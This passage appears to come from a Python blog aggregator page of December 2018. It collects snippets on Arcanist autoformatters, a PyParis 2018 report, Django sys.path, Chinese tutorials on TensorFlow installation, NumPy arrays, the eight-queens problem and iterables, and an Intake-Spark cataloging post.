Automatic Python Linters and Formatters for Arcanist

December 7, 2018, 8:48 am

≫ Next: PyParis 2018

≪ Previous: gamingdirectional: Create the third level for this pygame project

Linting code is important when working in a team, code written by others starts becoming familiar and easier to understand. Your team will possibly be divided on a big set of important aspects(tabs or spaces duh), but it is important to decide something that works for everyone and move towards one implementation quickly.

We use Phabricator for our code review process, and it supports linting at time of adding reviews. Arcanist has a lot of built in linters based on pep8 , flake8 etc. These linters tell the problems that exist with the code and if you have a big project, you are likely to see 100s of problems first time your run these.

I was convinced that we needed something which is non-obtrusive and does linting automatically instead of telling us what the problems are. Such linters can’t solve everything suggested by the PEP8 suggestion, but I find that they do a reasonably good job of ensuring code is clean and readable in a fast-paced environment.

I have written a small wrapper around the following auto code-formatters for Arcanist to bring some consistency in our development process. You can find the repository here: Arcanist python Lint Autoformat .

Included formatters

↧

PyParis 2018

December 7, 2018, 8:46 am

≫ Next: Django&colon; What is &grave;sys&period;path 'supposed to be ...

≪ Previous: Automatic Python Linters and Formatters for Arcanist

At Sqreen we try to attend any conference that is related to our tech stack. To learn and interact, and, sometimes, to present. This year at PyParis 2018 we did all of those things. It was a well-organized event, with two main tracks; one for data science, and one for regular python development (called “web/core”). Most people, regardless of their main track, could find something relevant and interesting for them.

The conference kicked off with a keynote by Nina from Microsoft: a Python developer evangelist for Azure, who had recently flown in from Portland and whose internal clock was still tuned to the middle of the night. But that didn’t stop her from delivering an energetic and fun presentation about technical debt!

Technical Debt: the Code Monster in your Closet by Nina Zakharenko ( slides , video )

After the keynote, the conference split into the tracks.

Sqreen’s own CTO Jean-Baptiste Aviat did a presentation at the conference, called Scaling from 0 to 60k RPM (requests-per-minute) ( slides , video ).

It was a fast-paced retrospective on how Sqreen has dealt with scaling issues from way back when our APIs had 0 RPM, up to now when we have about 60 000 RPM. It was an accessible presentation even if you don’t have a lot of experience in Python, or scaling for that matter.

The conference’s data science track was pretty good. Our senior data scientist Bartosz comments:

In general terms, I found the conference interesting. Especially, the merge between the data and web communities was a very good idea, but unfortunately these two tracks were 5 floors apart, so changing between them was not an easy exercise. I attended mainly the data track: there were many interesting talks, but I wish some of them explored the technical aspects in more depth.

Overall, the data track was well balanced, so that the talks were accessible to people without a data science background, while still remaining interesting to seasoned data scientists.

Our highlights from a data science perspective were:

Array computing in Python by Wolf Vollprecht ( slides , video )
The speaker from QuantStack did a very good job at giving a chronological account of the “vectorised” array computation capabilities in Python (for those who don’t know, arrays allow to run computations on all array items in parallel).
We also learned about a few interesting libraries to look into (xnd, Pythran, generic code in NumPy NEP18) Interactive widgets in the Jupyter Notebook by Martin Renou ( slides , video ).
Another QuantStack employee reviewed the interactive widgets that can be embedded into Jupyter notebooks. There were some impressive examples, like a cartographic map with embedded graphs. Deep learning of hotel images by Christopher Lennan & Tanuj Jain ( slides , video )
Not surprisingly there were quite a few talks about deep learning. We especially enjoyed this one. The speakers (Idealo’s data science team) presented an automatic quality check of hotel images that was used in production at Idealo. Understanding and diagnosing your machine-learning models by Gael Varoquaux ( materials )
This was a gem of a session. It wasn’t a part of the main data or core tracks, but rather the smaller hands-on tutorial track. It covered advanced methods for debugging machine-learning models, and presented by one of thescikit-learn creators.

Apart from the data track, the atmosphere was great too, and in between the presentations, we managed to meet a lot of smart people to chat with. Our backend team lead Benot writes:

I mostly attended the Python track. The atmosphere was very nice. It was packed, because the conference took place in a school. There were plenty of nice people to chat with during the breaks/lunch. Many people seem to be working on, or were very interested in security.

Benot’s highlights for the conference from both tracks:

Crossing the native code frontier by Serge sans Paille ( slides , video )
An in-depth look at the internals of CPython, exploring how we can make computations much faster. Vim Your Python, Python Your Vim by Miroslav ediv ( slides , video )
Awesome talk about getting most power out your keyboard and vim setup. The subject could seem like a solved issue. It’s not and the delivery of the talk was top-notch! Deep learning of hotel images by

↧

Django&colon; What is &grave;sys&period;path 'supposed to be ...

December 7, 2018, 8:44 am

≫ Next: tensorflow安装过程

≪ Previous: PyParis 2018

When developing a Django application, what is sys.path supposed to contain? The directory which contains the project, or the directory of the project, or both?

sys.path should and will have the directory of the project. Depending on what your setup is, it may also contain the directory which contains the project.

However, if the motivation behind this question is to ensure that certain files can be found, then you should note that sys.path is just like a normal list and can be appended to. Therefore, you can add a new location to sys.path like so:

sys.path.append('/home/USER/some/directory/')

where your files can be found.

Hope this helps

↧

tensorflow安装过程

December 7, 2018, 8:42 am

≫ Next: NumPy基础：多维数组

≪ Previous: Django&colon; What is &grave;sys&period;path 'supposed to be ...

编辑推荐:

本文来自于csdn，本文章详细介绍了在windows环境下tensorflow的安装过程以及步骤，希望对您的学习有所帮助。

一，前言：本次安装tensorflow是基于python的，安装Python的过程不做说明（既然决定按，Python肯定要先了解啊）：本次教程是windows下Anaconda安装Tensorflow的过程（cpu版，显卡不支持gpu版的...）

二，安装环境：（tensorflow支持的系统是64位的，windows和linux，mac都需要64位）

windows7（其实和windows版本没什么关系，我的是windows7，安装时参照的有windows10的讲解）

Python3.5.2（之前电脑上是安装的就是这个版本，如果你安装了，不知道版本的话可以在命令窗口输入"python --version",会显示你已安装的Python的版本号）

Anaconda3-4.2.0-Windows-x86_64.exe (windows下安装注意选择windows x86 64位就好)

三，Anaconda3-4.2.0-Windows-x86_64.exe

下载可以去官网上下载，直接搜索找与你电脑对应的版本就好，我个人习惯从国内镜像网站下载，下载快哇（国内清华镜像网站是：https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/）

下载完成后直接安装就行，步骤如下图所示：

自己用，就选择Just me

选择习惯的存储盘

下面两个全部选上，点Install安装就好了

验证Anaconda是否安装成功的方法：

命令窗口中输入“conda --version” ----->得到conda 4.2.0

看到了这个结果，恭喜你，你已经成功的安装上了Anaconda了，那么我们继续。

四，安装Tensorflow

安装Tensorflow时，需要从Anaconda仓库中下载，一般默认链接的都是国外镜像地址，下载肯定很慢啊（跨国呢！），这里我是用国内清华镜像，需要改一下链接镜像的地址。这里，我们打开刚刚安装好的Anaconda中的 Anaconda Prompt，然后输入：

conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/ conda config --set show_channel_urls yes

这两行代码用来改成连接清华镜像的

接下来安装Tensorflow，在Anaconda Prompt中输入：

conda create -n tensorflow python=3.5.2

一下图片是安装过程，有些坑我也写出来，注意一下就好：

正常的情况应该如下：

等待，然后输入“y”

然后：

看到上面这些activate tensorflow（这么直白的英语，看看是不是很激动，）恭喜你，tensorflow你已经安装成功啦，去激活一下，紧接着输入：“activate tensorflow”就Ok了

我们要安装的是CPU版本，那么在命令下紧接着输入：

pip install -i https://pypi.tuna.tsinghua.edu.cn/simple/https://mirrors.tuna.tsinghua.edu.cn/tensorflow/windows/cpu/tensorflow-1.1.0-cp35-cp35m-win_amd64.whl

你也可以自己选择对应的Tensorflow版本，可以在清华镜像中查看

经过一小会的等待，当你看见如上图最后一行时，那么，恭喜你，你已经安装成功了，是不是很惊喜，是不是很激动，是不是想测试一下呢，那么我们先测试一下吧

五，测试：

在Anaconda Prompt窗口中输入： python

进入python后输入：

import tensorflow as tf

sess = tf.Session()

a = tf.constant(10)

b= tf.constant(12)

sess.run(a+b)

好了，到这里你可以放心了，你可以使用Tensorflow了

六，那些年，那些坑：

好了，最后我们来填坑了

改为清华镜像时的错误：会显示路径错误，没关系，conda info 查看一下，你会发现：

很明显的发现地址乱了，不过没关系，找到电脑：C:\Users\Administrator中的.condarc文件，打开，然后修改一下，如下就可以了

然后在回到命令窗口，你可以继续安装了。

如果你在安装Tensorflow时出现了如下情况：s

哇，那么多红色字体，不要担心，看最后一段，提示是版本问题，我们就升级版本就好了。

操作如下图所示：

结果：

好了，问题解决了

↧

NumPy基础：多维数组

December 7, 2018, 8:40 am

≫ Next: 少说话多写代码之Python学习055――类的成员（生成器的应用举例）

≪ Previous: tensorflow安装过程

编辑推荐: 本文来源csdn，本文主要介绍花式索引和布尔型索引涉及到复制操作，其他的都是返回源数据的视图。

NumPy（Numerical python的基础）是高性能科学计算和数据分析的基础包。其部分功能如下：

1.ndarray，一个具有矢量算术运算和复杂广播能力的快速且节省空间的多维数组。

2.用于对数组数据进行快速运算的标准数学函数（无序编写循环）。

3.用于读写磁盘数据的工具及其用于操作内存映射文件的工具。

4.线性代数、随机数生成以及傅里叶变换功能。

5.用于集成由C、C++、Fortran等语言编写的代码的工具。

创建ndarray

创建数组最简单的办法就是使用array函数。它接受一切序列型的对象（包括其他数组），然后产生一个新的含有传入数据的NumPy数组。

列表的转换：

data1 = [6,7.5,8,0,1]

arr1 = np.array(data1)

# array([ 6. , 7.5, 8. , 0. , 1. ])

嵌套序列（比如由一组等长列表组成的列表）将会被转为一个多维数组：

data2 = [[1,2,3,4],[5,6,7,8]]

arr2 = np.array(data2)

# array([[1, 2, 3, 4], # [5, 6, 7, 8]])

data2是一个list of lists, 所以arr2维度为2。我们能用ndim和shape属性来确认一下：

arr2.ndim

# 2

arr2.shape

# (2,4)

除非主动声明，否则np.array会自动给data搭配适合的类型，并保存在dtype里：

arr1.dtype

# dtype('float64')

arr2.dtype

# dtype('int64')

除了np.array，还有一些其他函数能创建数组。比如zeros,ones,另外还可以在一个tuple里指定shape：

np.zeros(10)

# array([ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])

np.zeros((3,6))

# array([[ 0., 0., 0., 0., 0., 0.], # [ 0., 0., 0., 0., 0., 0.], # [ 0., 0., 0., 0., 0., 0.]])

np.empty((2,3,2))

# array([[[ 0.00000000e+000, 0.00000000e+000], # [ 2.16538378e-314, 2.16514681e-314], # [ 2.16511832e-314, 2.16072529e-314]], # [[ 0.00000000e+000, 0.00000000e+000], # [ 2.14037397e-314, 6.36598737e-311], # [ 0.00000000e+000, 0.00000000e+000]]])

np.empty并不能保证返回所有是0的数组，某些情况下，会返回为初始化的垃圾数值，如上。

arange是一个数组版的python range函数：

np.arange(15)

# array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])

一些创建数组的函数：

ndarray的数据类型

dtype保存数据的类型：

arr1 = np.array([1, 2, 3], dtype=np.float64) arr2 = np.array([1, 2, 3], dtype=np.int32)

arr1.dtype

# dtype('float64')

arr2.dtype

# dtype('int32')

dtype才是numpy能灵活处理其他外界数据的原因。

可以用astype来转换类型：

arr = np.array([1, 2, 3, 4, 5])

arr.dtype

# dtype('int64')

float_arr = arr.astype(np.float64)

float_arr.dtype

# dtype('float64')

上面是把int变为float。如果是把float变为int，小数点后的部分会被丢弃：

arr = np.array([3.7, -1.2, -2.6, 0.5, 12.9, 10.1])

arr

# array([ 3.7, -1.2, -2.6, 0.5, 12.9, 10.1])

arr.astype(np.int32)

# array([ 3, -1, -2, 0, 12, 10], dtype=int32

还可以用astype把string里的数字变为实际的数字：

numeric_strings = np.array(['1.25', '-9.6', '42'], dtype=np.string_)

numeric_strings

# array([b'1.25', b'-9.6', b'42'],

# dtype='|S4')

numeric_strings.astype(float)

# array([ 1.25, -9.6 , 42. ])

要十分注意numpy.string_类型，这种类型的长度是固定的，所以可能会直接截取部分输入而不给警告。

如果转换（casting）失败的话，会给出一个ValueError提示。

可以用其他数组的dtype直接来制定类型：

int_array = np.arange(10)

calibers = np.array([.22, .270, .357, .380, .44, .50], dtype=np.float64)

int_array.astype(calibers.dtype)

# array([ 0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])

还可以利用类型的缩写，比如u4就代表unit32：

empty_unit32 = np.empty(8, dtype='u4')

empty_unit32

# array([0, 0, 0, 0, 0, 0, 0, 0], dtype=uint32)

astype总是会返回一个新的数组。

数组和标量之间的运算

数组很重要，因为它使你不用编写循环即可对数据执行批量运算。叫做矢量化。大小相等的数组之间的任何算术运算都会将运算应用到元素级：

arr = np.array([[1., 2., 3.], [4., 5., 6.]])

arr

# array([[ 1., 2., 3.], # [ 4., 5., 6.]]

arr * arr

# array([[ 1., 4., 9.], # [ 16., 25., 36.]])

arr - arr

# array([[ 0., 0., 0.], # [ 0., 0., 0.]])

数组与标量的算术运算也会将那个标量值传播到各个元素:

1 / arr

# array([[ 1. , 0.5 , 0.33333333], # [ 0.25 , 0.2 , 0.16666667]])

arr ** 0.5

# array([[ 1. , 1.41421356, 1.73205081], # [ 2. , 2.23606798, 2.44948974]])

不同大小的数组之间的运算叫做广播（broadcasting）。

基本的索引和切片

NumPy数组的索引选取数据子集或单个元素的方式有很多。一维数组和Python列表功能差不多：

arr = np.arange(10)

arr

# array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) arr[5]

# 5

arr[5:8] # array([5, 6, 7]) arr[5:8] = 12

arr

# array([ 0, 1, 2, 3, 4, 12, 12, 12, 8, 9]) 当你将一个标量值赋给一个切片时（如arr[5:8]=12），该值会自动传播（“广播”）到整个选区。和Python列表不同的是，数组切片是原始数组的视图。这意味着数据不会被复制，任何修改都会反应到源数组上。 arr_slice = arr[5:8]

arr_slice

# array([12, 12, 12]) arr_slice[1] = 12345 # array([ 0, 1, 2, 3, 4, 12, 12345, 12, 8, 9]) arr_slice[:] = 64

arr

# array([ 0, 1, 2, 3, 4, 64, 64, 64, 8, 9]) 若想得到ndarray切片的一份副本，就需要显式地进行复制操作，例如arr[5:8].copy()

在一个二维数组中，各索引位置上的元素不再是标量而是一维数组：

arr2d = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) arr2d[2] # array([7, 8, 9])

有两种方式可以访问单一元素:

arr2d[0][2]

# 3

arr2d[0, 2]

# 3

二维数组的索引方式：

对于多维数组，如果省略后面的索引，返回的将是一个低纬度的多维数组。例如，一个2 x 2 x 3数组

arr3d = np.array([[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])

arr3d

# array([[[ 1, 2, 3], # [ 4, 5, 6]], # [[ 7, 8, 9], # [10, 11, 12]]]) arr3d[0]是一个2x3数组： arr3d[0] # array([[1, 2, 3], # [4, 5, 6]]) 标量和数组都能赋给arr3d[0]: old_values = arr3d[0].copy() arr3d[0] = 42

arr3d

# array([[[42, 42, 42], # [42, 42, 42]], # [[ 7, 8, 9], # [10, 11, 12]]]) arr3d[0] = old_values

arr3d

# array([[[ 1, 2, 3], # [ 4, 5, 6]], # [[ 7, 8, 9], # [10, 11, 12]]]) arr3d[1, 0]会给返回一个(1, 0)的一维数组： arr3d[1, 0] # array([7, 8, 9])

注意，上述选取数组子集的例子返回的都是视图（不是副本，是本尊）。

切片索引

ndarray的切片语法和Python列表这样的一维对象差不多。

高维对象可以再一个或多个轴上进行切片，也可以跟整数索引混合使用。

arr2d

# array([[1,2,3], # [4,5,6] # [7,8,9]]) arr2d[:2] # array([[1,2,3], # [4,5,6]])

可以看出，它是沿着axis 0（行）来处理的。可以一次传入多个切片，就像传入多个索引那样：

arr2d[:2, 1:] # array([[2, 3], # [5, 6]])

如此切片，只能得到相同维数的数组视图。。将整数索引和切片混合，可以得到低纬度切片：

arr2d[1, :2] # array([4, 5])

注意，只有冒号表示选取整个轴，例如：

arr2d[:, :1] # array([[1], # [4], # [7]])

对切片表达式的赋值操作也会扩散到整个选区：

arr2d[:2, 1:] = 0

arr2d

# array([[1, 0, 0], # [4, 0, 0], # [7, 8, 9]])

布尔型索引

假设我们有一个用于存储数据的数组以及一个存储姓名的数组（含有重复项）。比如说：

names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])

names

# array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'],

# dtype='<U4')

data = np.random.randn(7, 4)

data

# array([[ 0.06226591, -0.27507719, 0.39229467, 1.0592541 ], # [ 0.29856009, -0.287806 , -1.06875432, -0.33292789], # [-0.48500348, -0.10072345, -1.76972263, -0.27355081], # [ 0.23004649, -0.76163183, 0.24673954, -0.47700137], # [ 1.54353606, -0.17964118, -0.7093982 , -1.55488714], # [ 0.17778785, 1.25049472, 1.92926838, 0.49794146], # [ 0.11571349, -1.28075539, -1.15407468, 0.86778147]])

假设每个名字对应data数组中的一行，我们想要选出对应于名字'Bob'的所有行。和算术运算一样，数组的比较运算（如==）也是矢量化的。因此，对names和字符串“Bob”的比较运算会产生一个布尔型数组：

names == 'Bob'

# array([ True, False, False, True, False, False, False], dtype=bool)

布尔型数组可用于数组索引：

data[names == 'Bob'] # array([[ 0.02584271, -1.53529621, 0.73143988, -0.34086189], # [-0.48632936, 0.63817756, -0.40792716, -1.48037389]])

布尔型数组的长度必须跟被索引的轴长度一致。还可以将布尔型数组跟切片、整数（或整数序列）混合使用：

data[names == 'Bob', 2:] # array([[ 0.73143988, -0.34086189], # [-0.40792716, -1.48037389]]) data[names == 'Bob', 3] # array([-0.34086189, -1.48037389])

选中除了'Bob'外的所有行，可以用!=或者~：

names != 'Bob'

# array([False, True, True, False, True, True, True], dtype=bool) data[~(names == 'Bob')] # array([[ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 1.95024076, -0.37291038, -0.40424703, 0.30297059], # [-0.81976335, -1.10162466, -0.59823212, -0.10926744], # [-0.5212113 , 0.29449179, 2.0568032 , 2.00515735], # [-2.36066876, -0.3294302 , -0.24464646, -0.81432884]])

选取这三个名字中的两个需要组合应用多个布尔条件，如&（与）、|（或）之类的布尔运算符。

names

# array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'],

# dtype='<U4')

mask = (names == 'Bob') | (names == 'Will')

mask

# array([ True, False, True, True, True, False, False], dtype=bool) data[mask] # array([[ 0.02584271, -1.53529621, 0.73143988, -0.34086189], # [ 1.95024076, -0.37291038, -0.40424703, 0.30297059], # [-0.48632936, 0.63817756, -0.40792716, -1.48037389], # [-0.81976335, -1.10162466, -0.59823212, -0.10926744]])

通过布尔型索引选取数组中的数据，总是创建数据的副本，即使返回一摸一样的数组也是如此。

通过布尔型数组设置值是一种常用手段，为了将data中的所有负值设置为0，只需：

data[data < 0] = 0

data

# array([[ 0.02584271, 0. , 0.73143988, 0. ], # [ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 1.95024076, 0. , 0. , 0.30297059], # [ 0. , 0.63817756, 0. , 0. ], # [ 0. , 0. , 0. , 0. ], # [ 0. , 0.29449179, 2.0568032 , 2.00515735], # [ 0. , 0. , 0. , 0. ]])

通过一维布尔数组设置整行或列的值也很简单：

data[names != 'Joe'] = 7

data

# array([[ 7. , 7. , 7. , 7. ], # [ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 7. , 7. , 7. , 7. ], # [ 7. , 7. , 7. , 7. ], # [ 7. , 7. , 7. , 7. ], # [ 0. , 0.29449179, 2.0568032 , 2.00515735], # [ 0. , 0. , 0. , 0. ]])

花式索引

花式索引是一个NumPy术语，它指的是利用整数数组进行索引。假设有一个8 x 4的数组：

arr = np.empty((8, 4))

for i in range(8):

arr[i] = i

arr

# array([[ 0., 0., 0., 0.], # [ 1., 1., 1., 1.], # [ 2., 2., 2., 2.], # [ 3., 3., 3., 3.], # [ 4., 4., 4., 4.], # [ 5., 5., 5., 5.], # [ 6., 6., 6., 6.], # [ 7., 7., 7., 7.]])

为了以特定顺序选取子集，只需传入一个指定顺序的整数列表或ndarray即可：

arr[[4, 3, 0, 6]] # array([[ 4., 4., 4., 4.], # [ 3., 3., 3., 3.], # [ 0., 0., 0., 0.], # [ 6., 6., 6., 6.]])

使用负数索引将从末尾开始选行：

arr[[-3, -5, -7]] # array([[ 5., 5., 5., 5.], # [ 3., 3., 3., 3.], # [ 1., 1., 1., 1.]])

一次掺入多个索引数组会有一点特别。其返回的是一个一维数组，其中的元素对应各个索引元组：

arr = np.arange(32).reshape((8, 4))

arr

# array([[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11], # [12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23], 3 [24, 25, 26, 27], # [28, 29, 30, 31]]) arr[[1, 5, 7, 2], [0, 3, 1, 2]] # array([ 4, 23, 29, 10]) 以看到[ 4, 23, 29, 10]分别对应(1, 0), (5, 3), (7, 1), (2, 2)。不论数组有多少维，花式索引的结果总是一维。选取矩阵的行列子集可以使用如下方式： arr[[1, 5, 7, 2]][:, [0, 3, 1, 2]] # array([[ 4, 7, 5, 6], # [20, 23, 21, 22], # [28, 31, 29, 30], # [ 8, 11, 9, 10]]) 上面的意思是，先从arr中选出[1, 5, 7, 2]这四行： array([[ 4, 5, 6, 7], [20, 21, 22, 23], [28, 29, 30, 31], [ 8, 9, 10, 11]]) 然后[:, [0, 3, 1, 2]]表示选中所有行，但是列的顺序要按0,3,1,2来排。于是得到： array([[ 4, 7, 5, 6], [20, 23, 21, 22], [28, 31, 29, 30], [ 8, 11, 9, 10]])

花式索引跟切片不同，总是将数据复制到新数组中。

数组转置和轴对换

转置是重塑的一种特殊形式，其返回源数据的视图（不会进行任何复制操作）。有两种方式，一是transpose方法，二是T属性。

arr = np.arange(15).reshape((3, 5))

arr

# array([[ 0, 1, 2, 3, 4], # [ 5, 6, 7, 8, 9], # [10, 11, 12, 13, 14]])

arr.T

# array([[ 0, 5, 10], # [ 1, 6, 11], # [ 2, 7, 12], # [ 3, 8, 13], # [ 4, 9, 14]])

再进行矩阵计算时，常需要该操作，如利用np.dot计算内积：

arr = np.random.randn(6,3)

np.dot(arr.T,arr)

# array([[ 1.8717599 , -1.66444711, -0.65044072], # [-1.66444711, 6.02759713, 0.05453921], # [-0.65044072, 0.05453921, 3.65394036]])

对于高维数组，transpose需要得到一个由轴编号组成的元组才能对这些轴进行转置（比较费查克拉）：

arr = np.arange(16).reshape((2, 2, 4))

arr

# array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7]], # [[ 8, 9, 10, 11], # [12, 13, 14, 15]]])

arr.transpose((1, 0, 2))

# array([[[ 0, 1, 2, 3], # [ 8, 9, 10, 11]], # [[ 4, 5, 6, 7], # [12, 13, 14, 15]]])

其实就是把原本的轴按元组里的内容重排一下。简单的转置可以用.T。ndarray还有一个swapaxes方法，需要接受一对轴编号：

arr

# array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7]], # [[ 8, 9, 10, 11], # [12, 13, 14, 15]]])

arr.swapaxes(1, 2)

# array([[[ 0, 4], # [ 1, 5], # [ 2, 6], # [ 3, 7]], # [[ 8, 12], # [ 9, 13], # [10, 14], # [11, 15]]])

swapaxes也是返回数据的视图（不会进行任何复制操作）。

↧

少说话多写代码之Python学习055――类的成员（生成器的应用举例）

December 7, 2018, 8:38 am

≫ Next: Continuum Analytics Blog: Intake for Cataloging Spark

≪ Previous: NumPy基础：多维数组

我们来看一个有趣的问题：八皇后问题。这里的皇后是国际象棋中的皇后，虽然我只会玩中国象棋而不会玩国际象棋。这个问题和会不会国际象棋没有关系。

八皇后问题描述：如何能够在 8×8 的国际象棋棋盘上放置八个皇后，使得任何一个皇后都无法直接吃掉其他的皇后？为了达到此目的，任两个皇后都不能处于同一条横行、纵行或斜线上。

解决这个问题前，我们引入一个回溯的概念。比如我们走迷宫，前路未可知，向前走总会碰到岔路且是二选一的，我们一路选择岔路，直到发现无法走通，就回到倒数第二次的岔路继续二选一。如此往复，理论上我们最终总能走出迷宫。

那么，八皇后问题，我们依然这样解决。首先尝试放置第一个皇后，在第一行。然后放置第二个皇后，一次类推。如果发现不能放置下一个皇后，就回溯到上一步。

下面我们开始代码实现。

我们定义是否下一个皇后放的位置是否合法。我们用数组指定每一行皇后的位置。比如state[0]=2，表示第1行第3列的位置。我们用下面的函数表示下一个皇后放置的位置是否是正确的。 def confict(state,nextX): nextY = len(state) for i in range(nextY): if abs(state[i]-nextX) in (0,nextY-i): return True return False

nextX表示下一个皇后的水平位置，即x坐标。nextY表示垂直位置，即y坐标。对这两个皇后的位置做一个检查，如果下一个皇后和前面的皇后同样有同样的水平位置，或者是在一条对角线上，就表示不合法，返回True。如果检查没问题，返回False。之所以这样返回，是因为这个函数的意思本地放的位置错误。True表示真的错了，False表示没毛病。

关键的一句是：abs(state[i]-nextX) in (0,nextY-1)。下一个皇后和前一个皇后水平距离为0，或者垂直距离为0，都表示有错误。

关键的代码来了，

def queens(num=8,state=()): for pos in range(num): if not confict(state,pos): if len(state) == num-1: yield (pos,) else: for result in queens(num,state+(pos,)): yield (pos,)+result

回溯的问题一定是要递归来实现，才比较方便。假定最后一个皇后的位置是正确的，需要回溯到上一步，在前面的步骤中加入if else选择位置。这里是最难理解的。

我们先这样思考，当7个皇后都放好了位置，只剩最后一个皇后了，此时有两种情况：一是，根据前7个皇后能生成出最后一个皇后的所有位置。二是最后一个皇后没地方放了。

如果是情况一，那就解决问题了，此时事情做完了。如果是情况二，那么就要回溯到第七个皇后的位置问题了。第七个皇后需要重新放一次不同位置。

调用如下，

print(len(list(queens(3)))) print(len(list(queens(4)))) print(len(list(queens(8))))

输出

八皇后有92中放法。我们用图形打印出其中一种看看，

def prettyprint(s): def line(pos,length=len(s)): return '. ' *(pos) + 'X ' +'. ' * (length-pos-1) for pos in s: print(line(pos)) import random prettyprint(random.choice(list(queens(8))))

92种中的一种图形如下，

. . . X . . . . . X . . . . . . . . . . . . X . . . X . . . . . . . . . . X . . . . . . . . . X X . . . . . . . . . . . X . . .

工程文件下载： https://download.csdn.net/download/yysyangyangyangshan/10833745

↧

Continuum Analytics Blog: Intake for Cataloging Spark

December 7, 2018, 12:36 pm

≫ Next: 关于python中可迭代对象和迭代器的一些理解

≪ Previous: 少说话多写代码之Python学习055――类的成员（生成器的应用举例）

By: Martin Durant

Intake is an open source project for providing easy pythonic access to a wide variety of data formats, and a simple cataloging system for these data sources. Intake is a new project, and all are encouraged to try and comment on it.

pySpark is the python interface to Apache Spark, a fast and general purpose cluster computing system.

In this blog, we describe the new data driver for Intake, intake-spark , which allows data sources that are to be loaded via Spark to be described and enumerated in Intake catalogs alongside other data sources, files, and data services. In addition, some existing Intake drivers are acquiring methods to be loaded with Spark rather than python libraries.

This is part of a series of blog posts about Intake:

taking-the-pain-out-of-data-access caching data on first read parsing data from filenamed

To run this code yourself, you first need to install requirements.

> conda install -c defaults -c intake intake intake-spark pyspark

New drivers

Intake-spark provides three new drivers for Intake:

spark_rdd spark_dataframe spark_cat

Let’s investigate the simplest case

In[1]:

import intake

We will perform a word count on a file in the current directory.

Encoding a Spark function for use with Intake is slightly involved, but not too difficult once one is familiar with it. The following cell encodes sc.textFile('cat.yaml').map(str.split).map(len) , where sc is the SparkContext. This style is typical in working with Spark, and in the Intake version, each stage of attribute look-up becomes an element in a list, with the attribute name (a string) and any other parameters (a list, each time).

The file in question is created a few cells down, if you don’t already have it.

In[2]: source = intake.open_spark_rdd([ ['textFile', ['cat.yaml']], ['map', [str.split]], ['map', [len]] ], {})

Calling to_spark() on this grabs the Spark reference to the RDD. Note that we are setting up the SparkContext automatically, and it will get a local cluster with as many workers as CPU cores. The last argument, {} , can be used t specify how the context is set up.

In[3]:

rdd = source.to_spark() rdd

Out[3]: PythonRDD[2] at RDD at PythonRDD.scala:53

To complete the word count, we can call sum() . We check the result by calling the command-line utility wc .

In[4]:

rdd.sum()

Out[4]:

Note that the read() and read_partition() methods work as expected, providing normal python methods.

In[5]:

source.read()

Out[5]: [1, 1, 1, 1, 3, 3, 3, 3, 3, 2, 3, 4, 2, 7, 2, 2] In[6]:

sum(source.read())

Out[6]: In[7]:

!wc -w cat.yaml

41 cat.yaml

As usual, we can get the equivalent YAML for this source and put it in a file to make a catalog. Note how python functions are expressed and the nesting of lists. It is more typical to have single-stage spark chains and leave the manipulation of the RDDs to user code.

In[8]:

print(source.yaml())

sources: spark_rdd: args: args: - - textFile - - cat.yaml - - map - - !!python/object/apply:builtins.getattr - !!python/name:builtins.str '' - split - - map - - !!python/name:builtins.len '' context_kwargs: {} description: '' driver: spark_rdd metadata: {}

In[9]:

%%writefile cat.yaml sources: example_rdd: args: args: - - textFile - - cat.yaml - - map - - !!python/object/apply:builtins.getattr - !!python/name:builtins.str '' - split - - map - - !!python/name:builtins.len '' context_kwargs: {} description: 'Gets number of words per line' driver: spark_rdd metadata: {}

Overwriting cat.yaml

In[10]:

# we get the same result from the catalog cat = intake.open_catalog('cat.yaml') cat.example_rdd.to_spark().sum()

Out[10]:

The same operation can be done with the spark_dataframe except that the starting point of the attribute lookups will be a SparkSession, as opposed to a SparkContext and a SparkDataframe output from to_spark() . The data-frame variant is able to introspect to determine the data types of the columns before loading any data.

Making a Context and Session The previous example used the default Spark context, local[*] , because the argument to context_kwargs was an empty dictionary. In general, intake-spark will make use of any context/session that already exists. It is best to create contexts/sessions ahead of time, in the standard way of creating them for your system. You can be certain that intake-spark will pick them up by explicitly setting them as follows: In[]:

from intake_spark.base import SparkHolder SparkHolder.set_class_session(sc=sc, session=session)

Additionally, you can include a set of arguments, e.g. master= , app_name= , hive=True , that intake-spark will use to create the session for you. These arguments can also be encoded into catalogs under the keyword context_kwargs .

In[]:

SparkHolder.set_class_session(master='spark://my.server:7077', ...)

Existing drivers

As an experimental feature, certain drivers in the Intake ecosystem will also use the .to_spark() method, which will produce the equivalent Spark instance for the data type of the original source. First set up the session using the methods above, otherwise the default cluster will be assumed which possibly maybe the local cluster.

In these cases, most python-specific arguments are simply ignored, and only the URL is passed to Spark. When accessing remote data services, Spark must be already correctly configured to give you access.

The drivers currently supported

↧

关于python中可迭代对象和迭代器的一些理解

December 7, 2018, 12:34 pm

≫ Next: 写爬虫还在用 python？快来试试 go 语言的爬虫框架吧

≪ Previous: Continuum Analytics Blog: Intake for Cataloging Spark

很多 python 教程中，对 python 的解释不容易理解，本文记录自己的理解和体会，是对迭代器和生成器的初步理解

一、关于迭代的认识

给定一个列表、元祖、字典、甚至字符串,我们使用 for 去遍历,这样我们叫迭代

1、列表的迭代

list1 = ['哈哈', '西西', '嘻嘻'] for x in list1: print(x) 复制代码

2、列表中需要迭代出下标使用 enumerate

